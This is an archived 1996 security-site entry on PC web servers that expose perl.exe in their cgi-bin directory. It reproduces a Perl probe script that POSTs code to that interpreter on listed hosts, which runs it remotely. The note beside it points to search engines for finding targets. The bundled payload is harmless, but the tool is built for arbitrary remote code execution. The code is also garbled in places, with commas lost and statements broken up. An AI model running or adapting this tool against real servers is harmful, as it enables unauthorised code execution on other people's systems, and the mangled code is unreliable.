TUCoPS :: Web :: General :: pc-perl.txt

PC web site Perl interpreter vulnerability


PC Web site interpretor in cgi-bin directory vulnerability


PC Web site interpretor in cgi-bin directory vulnerability
Description:  A lot of idiots with PC web servers put perl.exe in their cgi-bin directory.
Author: tchrist@perl.com wrote this exploit
Compromise:  Execute arbitrary perl code on a PC (remote)
Vulnerable Systems:  Mostly PC web servers.  Wherever anyone is stupid enough to leave perl.exe in cgi-bin dir
Date:  28 March 1996
Notes:  You can find vulnerable site via altavista.  More information on this program available at
Exploit:


#!/usr/bin/perl -w
#
##############################################################################
# latrodectus cyberneticus - probe web for insecure perl installations
# tchrist@perl.com
# version 1.0
Thu Mar 28 17:53:42 MST 1996
#
# requires the LWP library
fetchable from the CPAN multiplexor at
#    http://www.perl.com/cgi-bin/cpan_mod?module=LWP
##############################################################################

require 5.002;
use strict;
use LWP::UserAgent;

=head1 NAME

latrodectus cyberneticus - probe web for insecure perl installations

=head1 SYNOPSIS

Via command line arguments:

latro host1 //host2/bincgi //host3/bincgi/badperl

or via STDIN:

sed 's/ .*//' access_log | sort -u | latro

=head1 DESCRIPTION

B is designed to probe whether your site or sites you control have
been compromised by the insanely idiotic practice of placing a perl
executable in the cgi-bin.  If you have ever seen anyone post a URL like

http://dummy.org/cgi-bin/perl.exe?FMH.pl

then you know they have the problem.  This is pathetically
pervasive amongst (horrifically mismanaged) sub-Unix web sites.

=head1 USE AND MISUSE

Robert Heinlein once wrote: "Stupidity cannot be cured with money
or
through education
or by legislation.  Stupidity is not a sin
the victim
can't help being stupid.  But stupidity is the only universal capital
crime; the sentence is death
there is no appeal
and execution is carried
out automatically and without pity."

Consider this program such execution -- or at least the threat thereof.

You can do very evil things with this program.  Very evil things.  You can
execute I on their site.  Please don't do anything
(too) wicked.  When you find such sites
please do the responsible and professional
thing and mail their cluefully challenged webmaster about the problem.

My goal with this program is to shake up the web a little bit now lest a
I poison spider should someday rip it to shreds and blame perl.  It's not
perl's fault.  It's the idiocy of the PC web sites -- and the vendors and
docs that tell them to do this ineffably idiotic and evil thing.

=head1 AUTHOR

Tom Christiansen

Last update:
Thu Mar 28 17:53:42 MST 1996

=cut

my $PROGNAME = "latrodectus cyberneticus";
my $VERSION = "1.0";

my $DEF_CGI_BIN   = "/cgi-bin";

# should prolly both "perl" and "perl.com" as well as
# the "perl.exe" thing.
my $DEF_PERL_PATH = "/perl.exe";
my $PROGRAM = join qq===>;

$| = 1;

#use LWP::Debug qw(level);
#level('+');

if (@ARGV) {
for (@ARGV) { probe($_) }
} elsif (!-t STDIN) {
while () {
chomp;
probe($_);
}
} else {
die "usage: $0 [site ...]\n";
}

sub probe {
my $site = shift;

my $cgi_bin = '';
my $perl_path = '';
my $pre_site = '';

if ($site !~ m#/#) {
$cgi_bin = $DEF_CGI_BIN;
}
if ($site !~ /perl/) {
$perl_path = $DEF_PERL_PATH;
}
if ($site !~ m#^//#) {
$pre_site = '//';
}

my $ua  = LWP::UserAgent->new();
$ua->agent("$PROGNAME
v$VERSION");

my $full_targ = 'http:' . $pre_site . $site . $cgi_bin . $perl_path;

printf "%-35s "
$site;

my $req = HTTP::Request->new( POST => $full_targ );

$req->content_type('application/x-www-form-urlencoded');
$req->content($PROGRAM);
my $res = $ua->request($req);

# check the outcome
if ($res->is_success) {
if ($res->content =~ /WWW Black Widow/) {
print ">>\n";
} else {
my $oops = $res->content;
$oops =~ s/\n/ /g;
print "APPREHENDED: $oops\n";
}
} else {
my $oops = $res->code .  " " .  $res->message;
if ($res->code == 404) {
print "SAFE:  $oops";
} else {
print "ERROR: $oops";
}
print "\n" unless $oops =~ /\n$/;
}

}

__END__

# Here begins the remote program.  Whatsoever you place
# within this code shall be executed on the foreign system

# without checks
without pity
and without remorse.
#
# Play nicely.

print ;

print "If I were nasty
you'd be spiderfood by now.\n";

print "\n\n\t--the black widow\n";

__END__





TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH